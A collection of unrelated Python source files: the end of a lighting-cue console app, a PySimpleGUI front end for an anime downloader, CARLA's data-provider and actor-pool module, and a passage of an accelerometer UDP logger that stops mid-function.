self.cues.current.uptime = float(cp[1])
self.cues.current.waituptime = float(cp[2])
self.cues.current.downtime = float(cp[3])
self.cues.current.waitdowntime = float(cp[4])
self.cues.current.followtime = float(cp[5])
self.updateCurrent()
#########################################
#
# This is called when the command line starts with "pat"
#
#########################################
def process_patch_cmd(self, cp):
if len(cp) == 3:
self.cues.patchAddressToChannel( int(cp[1]), int(cp[2]) )
elif len(cp) == 4:
self.cues.patchAddressToChannel( int(cp[1]), int(cp[2]), float(cp[3]) )
elif len(cp) == 5:
self.cues.patchAddressToChannel( int(cp[1]), int(cp[2]), float(cp[3]), int(cp[4]) )
#option 0=normal 1=non-dim 2=always on 3=no-master
else:
self.displayPatch()
#########################################
#
# This is called when the command line starts with "dim"
#
#########################################
def process_dimmer_cmd(self, cp):
if len(cp) == 3:
self.cues.setOptionForAddress( int(cp[1]), int(cp[2]) )
elif len(cp) == 4:
self.cues.setOptionForAddress( int(cp[1]), int(cp[2]), int(cp[4]) )
else:
self.displayDimmerOptions()
#########################################
#
# This is called when the command line starts with "cue"
#
#########################################
def process_cue_cmd(self, n, cp):
if len(cp) == 2:
if len(cp[1]) > 0 and cp[1] != '?':
q = self.cues.cueForNumber(float(cp[1]))
if q != None:
self.cues.current = q
self.cues.next = q
self.updateCurrent()
else:
self.displayCues()
elif len(cp) > 2:
q = self.cues.cueForNumber(float(cp[1]))
if q != None:
self.cues.current = q
nn = 'time ' + n[5+len(cp[1]):]
self.process_cmd(nn)
#########################################
#
# This is called when the command line starts with "delete cue"
#
#########################################
def process_delete_cue_cmd(self, cp):
if len(cp) == 2:
if len(cp[1]) > 0:
q = self.cues.cueForNumber(float(cp[1]))
if q != None:
shoulddelete = tkmsg_box.askyesno("Delete Cue!", "Are you sure?")
if shoulddelete == True:
self.cues.removeCue(q)
#########################################
#
# This is called when the command line starts with "osc"
#
#########################################
def process_osc_cmd(self, cp):
if self.cues.current != None:
if len(cp) == 2:
if len(cp[1]) > 0 and cp[1] != '?':
self.cues.current.oscstring = cp[1]
elif cp[1] == '?':
self.displayOSC()
else:
self.cues.current.oscstring = None
elif cp[1] == '?':
self.displayOSC()
#####################################################################################
#
# This is the main program
#
#####################################################################################
def windowwillclose():
app.menuQuit()
root = Tk()
root.protocol("WM_DELETE_WINDOW", windowwillclose)
app = App(root)
root.mainloop()
#root.destroy()
|
GUI.py
|
import queue
import PySimpleGUI as sg
from threading import Thread
sg.theme('Dark Amber')
downloader = None
scraper = None
def execute(downloader, scraper, start_epi, end_epi) :
scraper.main(start_epi, end_epi, downloader.token)
downloader.download()
class Anime_GUI() :
def __init__(self, gui_queue, downloader, scraper) :
self.gui_queue = gui_queue
self.downloader = downloader
self.scraper = scraper
self.window = None
def create_ui(self) :
layout = [
[sg.Text("General Details",size=(15,1)),sg.Text("_"*60, pad=(0,15))],
[sg.Text("Anime URL (9anime.to)", text_color="white", size=(25,1)), sg.InputText(key="anime_url")],
[sg.Text("Animefillerlist URL", text_color="white", size=(25,1)), sg.InputText(key="names_url")],
[sg.Text("Save To", size=(25,1), text_color="white"), sg.InputText(key="location"), sg.FolderBrowse()],
[sg.Text("Episodes Details",size=(15,1)),sg.Text("_"*60, pad=(0,15))],
[sg.Text("From", text_color="white"), sg.InputText(key="start_epi", size=(5,1)), sg.Text("To", text_color="white"), sg.InputText(key="end_epi", size=(5,1)), sg.Text("Download Filler Episodes?", text_color="white"), sg.Combo(["Yes", "No"], size=(4,1), default_value="Yes", key="isFiller"), sg.Text("Threads", text_color="white"), sg.Spin([i for i in range(1,21)],initial_value=1, size=(3,1), key="threads")],
[],
[sg.Text("Optional Settings (Fill this if you don't have 2captcha key)",size=(45,1)),sg.Text("_"*25, pad=(0,15))],
[sg.Text("Recaptcha Token (Optional)", text_color="white", size=(25,1)), sg.Multiline(size=(45, 4), key="token")],
[sg.Column([[sg.Button("Download", size=(10,1))]], justification="right", pad=(35,5))],
[],
[sg.Text("Messages")],
[sg.Multiline(size=(None, 8), key="txt_msg", disabled=True)],
[]
]
self.window = sg.Window("Anime Downloader v0.1.1-alpha", layout)
def check_messages(self, values) :
txt = values["txt_msg"].strip()
while True :
try: # see if something has been posted to Queue
message = self.gui_queue.get_nowait()
except queue.Empty: # get_nowait() will get exception when Queue is empty
break # break from the loop if no more messages are queued up
# if message received from queue, display the message in the Window
if message:
txt += "\n" + message
self.window['txt_msg'].update(txt)
# do a refresh because could be showing multiple messages before next Read
self.window.refresh()
# print(message)
def run(self) :
self.create_ui()
while True :
# wait for up to 100 ms for a GUI event
event, values = self.window.read(timeout=100)
if event in (None, 'Exit'):
break
if event == "Download" :
self.scraper.download_9anime_url = values["anime_url"]
self.scraper.title_url = values["names_url"]
if values["names_url"] != "" :
self.downloader.titles = True
if values["isFiller"] == "Yes":
self.scraper.isFiller = True
else :
self.scraper.isFiller = False
tok = values["token"].rstrip()
if tok != "":
self.downloader.token = tok
directory = values["location"]
if directory != "" :
directory = directory.replace("\\", "/")
if not directory.endswith("/") :
directory+="/"
self.downloader.directory = directory
self.downloader.threads = values["threads"]
self.scraper.gui = self
self.downloader.gui = self
self.window["txt_msg"].update("[INFO] : Download started!")
self.window.refresh()
thread = Thread(target=execute, args=(self.downloader, self.scraper, values["start_epi"], values["end_epi"]), daemon=True)
thread.start()
self.check_messages(values)
self.window.close()
|
carla_data_provider.py
|
#!/usr/bin/env python
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides all frequently used data from CARLA via
local buffers to avoid blocking calls to CARLA
"""
from __future__ import print_function
import math
import random
import re
from threading import Thread
import carla
from six import iteritems
def calculate_velocity(actor):
"""
Method to calculate the velocity of a actor
"""
velocity_squared = actor.get_velocity().x**2
velocity_squared += actor.get_velocity().y**2
return math.sqrt(velocity_squared)
class CarlaDataProvider(object): # pylint: disable=too-many-public-methods
"""
This class provides access to various data of all registered actors
It buffers the data and updates it on every CARLA tick
Currently available data:
- Absolute velocity
- Location
- Transform
Potential additions:
- Acceleration
In addition it provides access to the map and the transform of all traffic lights
"""
_actor_velocity_map = dict()
_actor_location_map = dict()
_actor_transform_map = dict()
_traffic_light_map = dict()
_map = None
_world = None
_sync_flag = False
_ego_vehicle_route = None
@staticmethod
def register_actor(actor):
"""
Add new actor to dictionaries
If actor already exists, throw an exception
"""
if actor in CarlaDataProvider._actor_velocity_map:
raise KeyError(
"Vehicle '{}' already registered. Cannot register twice!".format(actor.id))
else:
CarlaDataProvider._actor_velocity_map[actor] = 0.0
if actor in CarlaDataProvider._actor_location_map:
raise KeyError(
"Vehicle '{}' already registered. Cannot register twice!".format(actor.id))
else:
CarlaDataProvider._actor_location_map[actor] = None
if actor in CarlaDataProvider._actor_transform_map:
raise KeyError(
"Vehicle '{}' already registered. Cannot register twice!".format(actor.id))
else:
CarlaDataProvider._actor_transform_map[actor] = None
@staticmethod
def register_actors(actors):
"""
Add new set of actors to dictionaries
"""
for actor in actors:
CarlaDataProvider.register_actor(actor)
@staticmethod
def perform_carla_tick(timeout=5.0):
"""
Send tick() command to CARLA and wait for at
most timeout seconds to let tick() return
Note: This is a workaround as CARLA tick() has no
timeout functionality
"""
t = Thread(target=CarlaDataProvider._world.tick)
t.daemon = True
t.start()
t.join(float(timeout))
if t.is_alive():
raise RuntimeError("Timeout of CARLA tick command")
@staticmethod
def on_carla_tick():
"""
Callback from CARLA
"""
for actor in CarlaDataProvider._actor_velocity_map:
if actor is not None and actor.is_alive:
CarlaDataProvider._actor_velocity_map[actor] = calculate_velocity(actor)
for actor in CarlaDataProvider._actor_location_map:
if actor is not None and actor.is_alive:
CarlaDataProvider._actor_location_map[actor] = actor.get_location()
for actor in CarlaDataProvider._actor_transform_map:
if actor is not None and actor.is_alive:
CarlaDataProvider._actor_transform_map[actor] = actor.get_transform()
@staticmethod
def get_velocity(actor):
"""
returns the absolute velocity for the given actor
"""
for key in CarlaDataProvider._actor_velocity_map:
if key.id == actor.id:
return CarlaDataProvider._actor_velocity_map[key]
# We are intentionally not throwing here
# This may cause exception loops in py_trees
print('{}.get_velocity: {} not found!' .format(__name__, actor))
return 0.0
@staticmethod
def get_location(actor):
"""
returns the location for the given actor
"""
for key in CarlaDataProvider._actor_location_map:
if key.id == actor.id:
return CarlaDataProvider._actor_location_map[key]
# We are intentionally not throwing here
# This may cause exception loops in py_trees
print('{}.get_location: {} not found!' .format(__name__, actor))
return None
@staticmethod
def get_transform(actor):
"""
returns the transform for the given actor
"""
for key in CarlaDataProvider._actor_transform_map:
if key.id == actor.id:
return CarlaDataProvider._actor_transform_map[key]
# We are intentionally not throwing here
# This may cause exception loops in py_trees
print('{}.get_transform: {} not found!' .format(__name__, actor))
return None
@staticmethod
def prepare_map():
"""
This function set the current map and loads all traffic lights for this map to
_traffic_light_map
"""
if CarlaDataProvider._map is None:
CarlaDataProvider._map = CarlaDataProvider._world.get_map()
# Parse all traffic lights
CarlaDataProvider._traffic_light_map.clear()
for traffic_light in CarlaDataProvider._world.get_actors().filter('*traffic_light*'):
if traffic_light not in CarlaDataProvider._traffic_light_map.keys():
CarlaDataProvider._traffic_light_map[traffic_light] = traffic_light.get_transform()
else:
raise KeyError(
"Traffic light '{}' already registered. Cannot register twice!".format(traffic_light.id))
@staticmethod
def get_world():
"""
Return world
"""
return CarlaDataProvider._world
@staticmethod
def is_sync_mode():
"""
@return true if syncronuous mode is used
"""
return CarlaDataProvider._sync_flag
@staticmethod
def set_world(world):
"""
Set the world and world settings
"""
CarlaDataProvider._world = world
settings = world.get_settings()
CarlaDataProvider._sync_flag = settings.synchronous_mode
CarlaDataProvider._map = CarlaDataProvider._world.get_map()
@staticmethod
def get_map(world=None):
"""
Get the current map
"""
if CarlaDataProvider._map is None:
if world is None:
if CarlaDataProvider._world is None:
raise ValueError("class member \'world'\' not initialized yet")
else:
CarlaDataProvider._map = CarlaDataProvider._world.get_map()
else:
CarlaDataProvider._map = world.get_map()
return CarlaDataProvider._map
@staticmethod
def annotate_trafficlight_in_group(traffic_light):
"""
Get dictionary with traffic light group info for a given traffic light
"""
dict_annotations = {'ref': [], 'opposite': [], 'left': [], 'right': []}
# Get the waypoints
ref_location = CarlaDataProvider.get_trafficlight_trigger_location(traffic_light)
ref_waypoint = CarlaDataProvider.get_map().get_waypoint(ref_location)
ref_yaw = ref_waypoint.transform.rotation.yaw
group_tl = traffic_light.get_group_traffic_lights()
for target_tl in group_tl:
if traffic_light.id == target_tl.id:
dict_annotations['ref'].append(target_tl)
else:
# Get the angle between yaws
target_location = CarlaDataProvider.get_trafficlight_trigger_location(target_tl)
target_waypoint = CarlaDataProvider.get_map().get_waypoint(target_location)
target_yaw = target_waypoint.transform.rotation.yaw
diff = (target_yaw - ref_yaw) % 360
if diff > 330:
continue
elif diff > 225:
dict_annotations['right'].append(target_tl)
elif diff > 135.0:
dict_annotations['opposite'].append(target_tl)
elif diff > 30:
dict_annotations['left'].append(target_tl)
return dict_annotations
@staticmethod
def get_trafficlight_trigger_location(traffic_light): # pylint: disable=invalid-name
"""
Calculates the yaw of the waypoint that represents the trigger volume of the traffic light
"""
def rotate_point(point, angle):
"""
rotate a given point by a given angle
"""
x_ = math.cos(math.radians(angle)) * point.x - math.sin(math.radians(angle)) * point.y
y_ = math.sin(math.radians(angle)) * point.x - math.cos(math.radians(angle)) * point.y
return carla.Vector3D(x_, y_, point.z)
base_transform = traffic_light.get_transform()
base_rot = base_transform.rotation.yaw
area_loc = base_transform.transform(traffic_light.trigger_volume.location)
area_ext = traffic_light.trigger_volume.extent
point = rotate_point(carla.Vector3D(0, 0, area_ext.z), base_rot)
point_location = area_loc + carla.Location(x=point.x, y=point.y)
return carla.Location(point_location.x, point_location.y, point_location.z)
@staticmethod
def update_light_states(ego_light, annotations, states, freeze=False, timeout=1000000000):
"""
Update traffic light states
"""
reset_params = []
for state in states:
relevant_lights = []
if state == 'ego':
relevant_lights = [ego_light]
else:
relevant_lights = annotations[state]
for light in relevant_lights:
prev_state = light.get_state()
prev_green_time = light.get_green_time()
prev_red_time = light.get_red_time()
prev_yellow_time = light.get_yellow_time()
reset_params.append({'light': light,
'state': prev_state,
'green_time': prev_green_time,
'red_time': prev_red_time,
'yellow_time': prev_yellow_time})
light.set_state(states[state])
if freeze:
light.set_green_time(timeout)
light.set_red_time(timeout)
light.set_yellow_time(timeout)
return reset_params
@staticmethod
def reset_lights(reset_params):
"""
Reset traffic lights
"""
for param in reset_params:
param['light'].set_state(param['state'])
param['light'].set_green_time(param['green_time'])
param['light'].set_red_time(param['red_time'])
param['light'].set_yellow_time(param['yellow_time'])
@staticmethod
def get_next_traffic_light(actor, use_cached_location=True):
"""
returns the next relevant traffic light for the provided actor
"""
CarlaDataProvider.prepare_map()
if not use_cached_location:
location = actor.get_transform().location
else:
location = CarlaDataProvider.get_location(actor)
waypoint = CarlaDataProvider.get_map().get_waypoint(location)
# Create list of all waypoints until next intersection
list_of_waypoints = []
while waypoint and not waypoint.is_intersection:
list_of_waypoints.append(waypoint)
waypoint = waypoint.next(2.0)[0]
# If the list is empty, the actor is in an intersection
if not list_of_waypoints:
return None
relevant_traffic_light = None
distance_to_relevant_traffic_light = float("inf")
for traffic_light in CarlaDataProvider._traffic_light_map:
if hasattr(traffic_light, 'trigger_volume'):
tl_t = CarlaDataProvider._traffic_light_map[traffic_light]
transformed_tv = tl_t.transform(traffic_light.trigger_volume.location)
distance = carla.Location(transformed_tv).distance(list_of_waypoints[-1].transform.location)
if distance < distance_to_relevant_traffic_light:
relevant_traffic_light = traffic_light
distance_to_relevant_traffic_light = distance
return relevant_traffic_light
@staticmethod
def set_ego_vehicle_route(route):
"""
Set the route of the ego vehicle
@todo extend ego_vehicle_route concept to support multi ego_vehicle scenarios
"""
CarlaDataProvider._ego_vehicle_route = route
@staticmethod
def get_ego_vehicle_route():
"""
returns the currently set route of the ego vehicle
Note: Can be None
"""
return CarlaDataProvider._ego_vehicle_route
@staticmethod
def find_weather_presets():
"""
Get weather presets from CARLA
"""
rgx = re.compile('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)')
name = lambda x: ' '.join(m.group(0) for m in rgx.finditer(x))
presets = [x for x in dir(carla.WeatherParameters) if re.match('[A-Z].+', x)]
return [(getattr(carla.WeatherParameters, x), name(x)) for x in presets]
@staticmethod
def cleanup():
"""
Cleanup and remove all entries from all dictionaries
"""
CarlaDataProvider._actor_velocity_map.clear()
CarlaDataProvider._actor_location_map.clear()
CarlaDataProvider._actor_transform_map.clear()
CarlaDataProvider._traffic_light_map.clear()
CarlaDataProvider._map = None
CarlaDataProvider._world = None
CarlaDataProvider._sync_flag = False
CarlaDataProvider._ego_vehicle_route = None
class CarlaActorPool(object):
"""
The CarlaActorPool caches all scenario relevant actors.
It works similar to a singelton.
An actor can be created via "request_actor", and access
is possible via "get_actor_by_id".
Using CarlaActorPool, actors can be shared between scenarios.
"""
_client = None
_world = None
_carla_actor_pool = dict()
_spawn_points = None
_spawn_index = 0
_blueprint_library = None
@staticmethod
def set_client(client):
"""
Set the CARLA client
"""
CarlaActorPool._client = client
@staticmethod
def set_world(world):
"""
Set the CARLA world
"""
CarlaActorPool._world = world
CarlaActorPool._blueprint_library = world.get_blueprint_library()
CarlaActorPool.generate_spawn_points()
@staticmethod
def get_actors():
"""
Return list of actors and their ids
Note: iteritems from six is used to allow compatibility with Python 2 and 3
"""
return iteritems(CarlaActorPool._carla_actor_pool)
@staticmethod
def generate_spawn_points():
"""
Generate spawn points for the current map
"""
spawn_points = list(CarlaDataProvider.get_map(CarlaActorPool._world).get_spawn_points())
random.shuffle(spawn_points)
CarlaActorPool._spawn_points = spawn_points
CarlaActorPool._spawn_index = 0
@staticmethod
def create_blueprint(model, rolename='scenario', hero=False, autopilot=False, color=None, actor_category="car"):
"""
Function to setup the most relevant actor parameters,
incl. spawn point and vehicle model.
"""
_actor_blueprint_categories = {
'car': 'vehicle.tesla.model3',
'van': 'vehicle.volkswagen.t2',
'truck': 'vehicle.carlamotors.carlacola',
'trailer': '',
'semitrailer': '',
'bus': 'vehicle.volkswagen.t2',
'motorbike': 'vehicle.kawasaki.ninja',
'bicycle': 'vehicle.diamondback.century',
'train': '',
'tram': '',
'pedestrian': 'walker.pedestrian.0001',
}
# Get vehicle by model
try:
blueprint = random.choice(CarlaActorPool._blueprint_library.filter(model))
except IndexError:
# The model is not part of the blueprint library. Let's take a default one for the given category
bp_filter = "vehicle.*"
new_model = _actor_blueprint_categories[actor_category]
if new_model != '':
bp_filter = new_model
print("WARNING: Actor model {} not available. Using instead {}".format(model, new_model))
blueprint = random.choice(CarlaActorPool._blueprint_library.filter(bp_filter))
if color:
if not blueprint.has_attribute('color'):
print(
"WARNING: Cannot set Color ({}) for actor {} due to missing blueprint attribute".format(
color, blueprint.id))
else:
default_color_rgba = blueprint.get_attribute('color').as_color()
default_color = '({}, {}, {})'.format(default_color_rgba.r, default_color_rgba.g, default_color_rgba.b)
try:
blueprint.set_attribute('color', color)
except ValueError:
# Color can't be set for this vehicle
print("WARNING: Color ({}) cannot be set for actor {}. Using instead: ({})".format(
color, blueprint.id, default_color))
blueprint.set_attribute('color', default_color)
# is it a pedestrian? -> make it mortal
if blueprint.has_attribute('is_invincible'):
blueprint.set_attribute('is_invincible', 'false')
if autopilot:
blueprint.set_attribute('role_name', 'autopilot')
else:
blueprint.set_attribute('role_name', rolename)
return blueprint
@staticmethod
def handle_actor_batch(batch):
"""
Forward a CARLA command batch to spawn actors to CARLA, and gather the responses
returns list of actors on success, none otherwise
"""
actors = []
sync_mode = CarlaActorPool._world.get_settings().synchronous_mode
if CarlaActorPool._client and batch is not None:
responses = CarlaActorPool._client.apply_batch_sync(batch, sync_mode)
else:
return None
# wait for the actors to be spawned properly before we do anything
if sync_mode:
CarlaDataProvider.perform_carla_tick()
else:
CarlaActorPool._world.wait_for_tick()
actor_ids = []
if responses:
for response in responses:
if not response.error:
actor_ids.append(response.actor_id)
carla_actors = CarlaActorPool._world.get_actors(actor_ids)
for actor in carla_actors:
actors.append(actor)
return actors
@staticmethod
def setup_actor(model, spawn_point, rolename='scenario', hero=False, autopilot=False,
random_location=False, color=None, actor_category="car"):
"""
Function to setup the most relevant actor parameters,
incl. spawn point and vehicle model.
"""
blueprint = CarlaActorPool.create_blueprint(model, rolename, hero, autopilot, color, actor_category)
if random_location:
actor = None
while not actor:
spawn_point = random.choice(CarlaActorPool._spawn_points)
actor = CarlaActorPool._world.try_spawn_actor(blueprint, spawn_point)
else:
# slightly lift the actor to avoid collisions with ground when spawning the actor
# DO NOT USE spawn_point directly, as this will modify spawn_point permanently
_spawn_point = carla.Transform(carla.Location(), spawn_point.rotation)
_spawn_point.location.x = spawn_point.location.x
_spawn_point.location.y = spawn_point.location.y
_spawn_point.location.z = spawn_point.location.z + 0.2
actor = CarlaActorPool._world.try_spawn_actor(blueprint, _spawn_point)
if actor is None:
raise RuntimeError(
"Error: Unable to spawn vehicle {} at {}".format(blueprint.id, spawn_point))
else:
# Let's deactivate the autopilot of the actor if it belongs to vehicle
if actor in CarlaActorPool._blueprint_library.filter('vehicle.*'):
actor.set_autopilot(autopilot)
else:
pass
# wait for the actor to be spawned properly before we do anything
if CarlaActorPool._world.get_settings().synchronous_mode:
CarlaDataProvider.perform_carla_tick()
else:
CarlaActorPool._world.wait_for_tick()
return actor
@staticmethod
def setup_actors(actor_list):
"""
Function to setup a complete list of actors
"""
SpawnActor = carla.command.SpawnActor # pylint: disable=invalid-name
PhysicsCommand = carla.command.SetSimulatePhysics # pylint: disable=invalid-name
FutureActor = carla.command.FutureActor # pylint: disable=invalid-name
ApplyTransform = carla.command.ApplyTransform # pylint: disable=invalid-name
batch = []
actors = []
for actor in actor_list:
blueprint = CarlaActorPool.create_blueprint(model=actor.model,
rolename=actor.rolename,
hero=False,
autopilot=actor.autopilot,
color=actor.color,
actor_category=actor.category)
# slightly lift the actor to avoid collisions with ground when spawning the actor
# DO NOT USE spawn_point directly, as this will modify spawn_point permanently
_spawn_point = carla.Transform(carla.Location(), actor.transform.rotation)
_spawn_point.location.x = actor.transform.location.x
_spawn_point.location.y = actor.transform.location.y
_spawn_point.location.z = actor.transform.location.z + 0.2
if 'physics' in actor.args and actor.args['physics'] == "off":
command = SpawnActor(blueprint, _spawn_point).then(
ApplyTransform(FutureActor, actor.transform)).then(PhysicsCommand(FutureActor, False))
elif actor.category == 'misc':
command = SpawnActor(blueprint, _spawn_point).then(PhysicsCommand(FutureActor, True))
else:
command = SpawnActor(blueprint, _spawn_point)
batch.append(command)
actors = CarlaActorPool.handle_actor_batch(batch)
return actors
@staticmethod
def setup_batch_actors(model, amount, spawn_point, hero=False, autopilot=False, random_location=False):
"""
Function to setup a batch of actors with the most relevant parameters,
incl. spawn point and vehicle model.
"""
SpawnActor = carla.command.SpawnActor # pylint: disable=invalid-name
SetAutopilot = carla.command.SetAutopilot # pylint: disable=invalid-name
FutureActor = carla.command.FutureActor # pylint: disable=invalid-name
blueprint_library = CarlaActorPool._world.get_blueprint_library()
if not hero:
hero_actor = CarlaActorPool.get_hero_actor()
else:
hero_actor = None
batch = []
for _ in range(amount):
# Get vehicle by model
blueprint = random.choice(blueprint_library.filter(model))
# is it a pedestrian? -> make it mortal
if blueprint.has_attribute('is_invincible'):
blueprint.set_attribute('is_invincible', 'false')
if hero:
blueprint.set_attribute('role_name', 'hero')
elif autopilot:
blueprint.set_attribute('role_name', 'autopilot')
else:
blueprint.set_attribute('role_name', 'scenario')
if random_location:
if CarlaActorPool._spawn_index >= len(CarlaActorPool._spawn_points):
CarlaActorPool._spawn_index = len(CarlaActorPool._spawn_points)
spawn_point = None
elif hero_actor is not None:
spawn_point = CarlaActorPool._spawn_points[CarlaActorPool._spawn_index]
CarlaActorPool._spawn_index += 1
# if the spawn point is to close to hero we just ignore this position
if hero_actor.get_transform().location.distance(spawn_point.location) < 8.0:
spawn_point = None
else:
spawn_point = CarlaActorPool._spawn_points[CarlaActorPool._spawn_index]
CarlaActorPool._spawn_index += 1
if spawn_point:
batch.append(SpawnActor(blueprint, spawn_point).then(SetAutopilot(FutureActor, autopilot)))
actor_list = CarlaActorPool.handle_actor_batch(batch)
return actor_list
@staticmethod
def request_new_batch_actors(model, amount, spawn_point, hero=False, autopilot=False, random_location=False):
"""
This method tries to create a new actor. If this was
successful, the new actor is returned, None otherwise.
"""
actors = CarlaActorPool.setup_batch_actors(model, amount, spawn_point, hero, autopilot, random_location)
if actors is None:
return None
for actor in actors:
CarlaActorPool._carla_actor_pool[actor.id] = actor
return actors
@staticmethod
def request_new_actor(model, spawn_point, rolename='scenario', hero=False, autopilot=False,
random_location=False, color=None, actor_category=None):
"""
This method tries to create a new actor. If this was
successful, the new actor is returned, None otherwise.
"""
actor = CarlaActorPool.setup_actor(
model, spawn_point, rolename, hero, autopilot, random_location, color, actor_category)
if actor is None:
return None
CarlaActorPool._carla_actor_pool[actor.id] = actor
return actor
@staticmethod
def request_new_actors(actor_list):
"""
This method tries to create a list of new actors. If this was
successful, the new actors are returned, None otherwise.
"""
actors = CarlaActorPool.setup_actors(actor_list)
if actors is None:
return None
for actor in actors:
CarlaActorPool._carla_actor_pool[actor.id] = actor
return actors
@staticmethod
def actor_id_exists(actor_id):
"""
Check if a certain id is still at the simulation
"""
if actor_id in CarlaActorPool._carla_actor_pool:
return True
return False
@staticmethod
def get_hero_actor():
"""
Get the actor object of the hero actor if it exists, returns none otherwise.
"""
for actor_id in CarlaActorPool._carla_actor_pool:
if CarlaActorPool._carla_actor_pool[actor_id].attributes['role_name'] == 'hero':
return CarlaActorPool._carla_actor_pool[actor_id]
return None
@staticmethod
def get_actor_by_id(actor_id):
"""
Get an actor from the pool by using its ID. If the actor
does not exist, None is returned.
"""
if actor_id in CarlaActorPool._carla_actor_pool:
return CarlaActorPool._carla_actor_pool[actor_id]
print("Non-existing actor id {}".format(actor_id))
return None
@staticmethod
def remove_actor_by_id(actor_id):
"""
Remove an actor from the pool using its ID
"""
if actor_id in CarlaActorPool._carla_actor_pool:
CarlaActorPool._carla_actor_pool[actor_id].destroy()
CarlaActorPool._carla_actor_pool[actor_id] = None
CarlaActorPool._carla_actor_pool.pop(actor_id)
else:
print("Trying to remove a non-existing actor id {}".format(actor_id))
@staticmethod
def cleanup():
"""
Cleanup the actor pool, i.e. remove and destroy all actors
"""
DestroyActor = carla.command.DestroyActor # pylint: disable=invalid-name
batch = []
for actor_id in CarlaActorPool._carla_actor_pool.copy():
batch.append(DestroyActor(CarlaActorPool._carla_actor_pool[actor_id]))
if CarlaActorPool._client:
try:
CarlaActorPool._client.apply_batch_sync(batch)
except RuntimeError as e:
if "time-out" in str(e):
pass
else:
raise e
CarlaActorPool._carla_actor_pool = dict()
CarlaActorPool._world = None
CarlaActorPool._client = None
CarlaActorPool._spawn_points = None
CarlaActorPool._spawn_index = 0
@staticmethod
def remove_actors_in_surrounding(location, distance):
"""
Remove all actors from the pool that are closer than distance to the
provided location
"""
for actor_id in CarlaActorPool._carla_actor_pool.copy():
if CarlaActorPool._carla_actor_pool[actor_id].get_location().distance(location) < distance:
CarlaActorPool._carla_actor_pool[actor_id].destroy()
CarlaActorPool._carla_actor_pool.pop(actor_id)
# Remove all keys with None values
CarlaActorPool._carla_actor_pool = dict({k: v for k, v in CarlaActorPool._carla_actor_pool.items() if v})
|
logger.py
|
#!/usr/bin/python
# logger.py
#
# Accelerometer server helper code
import socketserver
import socket
import time
from threading import Thread, Lock
import sys
from IPython.display import display
import socket
import ipywidgets as widgets
import matplotlib.pyplot as plt
# Configuration options
HOST = None
PORT = 9999
STATION_ID = "codetacc"
PREFER_SUBNET = "192.168"
CLIENT_TIMEOUT = 15000
# State options
STATE_DISCONNECTED = "DISCONNECTED";
STATE_CONNECTED = "CONNECTED";
STATE_RUNNING = "RUNNING";
STATE_STOPPED = "STOPPED";
# Message codes
OPCODE_CONFIGURE = 'r'
OPCODE_START = 's'
OPCODE_HALT = 'h'
OPCODE_KEEPALIVE = 'k'
OPCODE_PING = 'p'
OPCODE_ANNOUNCE = 'a'
RESPONSECODE_CLIENT = 'c'
RESPONSECODE_DATA = 'd'
# Dictionary to contain all client data
clients = dict()
# Dictionary lock
client_lock = Lock()
# Current data collection runtime
ms = 0
# Accelerometer Configuration
samplerate = "g"
samplerange = "b"
# Configuration code dictionary with human readable values
dividers = {"a": 16380, "b": 8192, "c": 4096, "d": 2048}
rates = {"a": "1 Hz", "b": "10 Hz", "c": "25 Hz", "d": "50 Hz", "e": "100 Hz", "f": "200 Hz", "g": "400 Hz"}
ranges = {"a": "2G", "b": "4G", "c": "8G", "d": "16G"}
# UI elements that need global access
sample_count_labels = dict()
status_labels = dict()
milliseconds_label = widgets.Label(value="0", layout=widgets.Layout(width="100%"))
_main_tabs = None
_status_panel = None
_export_panel = None
_settings_panel = None
# UDP Helper functions
def udp_send(ip, data):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
s.connect((ip, PORT))
s.send(data)
s.close()
def udp_broadcast(data):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('', 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.sendto(data.encode(), (b'<broadcast>', PORT))
s.close()
def send_configuration(ip):
udp_send(ip, OPCODE_CONFIGURE + samplerate + samplerange)
# Accelerometer command broadcasts
def broadcast_configure():
print("Configuring accelerometers with rate " + rates[samplerate] + " and range " + ranges[samplerange])
udp_broadcast(OPCODE_CONFIGURE + samplerate + samplerange)
def signal_start():
udp_broadcast(OPCODE_START)
global ms
ms = 0
print("Started data collection")
def halt_data_collection():
udp_broadcast(OPCODE_HALT)
print("Halted data collection")
pass
# Monitor thread that runs broadcasts and checks for timeouts every 5 seconds
class MonitorThread(Thread):
def __init__(self):
self.stopped = False
Thread.__init__(self)
def run(self):
while not self.stopped:
# Announce this station
udp_broadcast(OPCODE_ANNOUNCE + " " + STATION_ID)
# Check for timed out clients
client_lock.acquire()
for ip, client in clients:
if time.time() - client.last_announce > CLIENT_TIMEOUT:
client.state = STATE_DISCONNECTED
client_lock.release()
# Wait 5 seconds
time.sleep(5)
# Accelerometer Client object that stores connection info, state and client data
class AccelerometerClient(object):
def __init__(self, ip, clientId):
self.state = STATE_CONNECTED
self.events = list()
self.ip = ip
self.clientId = clientId
self.update_announce()
def update_announce(self):
self.last_announce = time.time()
def chunk(self, l, n):
for i in xrange(0, len(l), n):
yield l[i:i + n]
def process_data(self, data):
global ms
self.events.extend(self.chunk(data.split(' '), 5))
last_event = self.events[-1]
last_time = int(last_event[1])
self.update_announce()
if last_time > ms + 200:
ms = last_time
update_status()
# UDP listener that responds to packets sent by clients
class AccelUDPHandler(socketserver.BaseRequestHandler):
def handle(self):
global clients
# Get a packet
packet = self.request[0].strip()
# If the packet has data
if len(packet):
client_ip = self.client_address[0]
# Handle client announcements
if packet[0] == RESPONSECODE_CLIENT:
if client_ip not in clients:
if client_ip not in clients:
client_lock.acquire()
clients[client_ip] = AccelerometerClient(client_ip, packet[1:])
client_lock.release()
_status_panel = build_status_panel()
_main_tabs.children = [ _status_panel, _export_panel, _settings_panel ]
print(clients[client_ip].clientId + " connected")
send_configuration(client_ip)
else:
clients[client_ip].update_announce()
# Handle data packets
elif packet[0] == RESPONSECODE_DATA:
if client_ip in clients:
clients[client_ip].process_data(packet[1:])
# Required mix-in class for threaded UDP server
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
# Get a list of local interfaces and a good guess as to which interface to use
def get_interfaces():
global PREFER_SUBNET
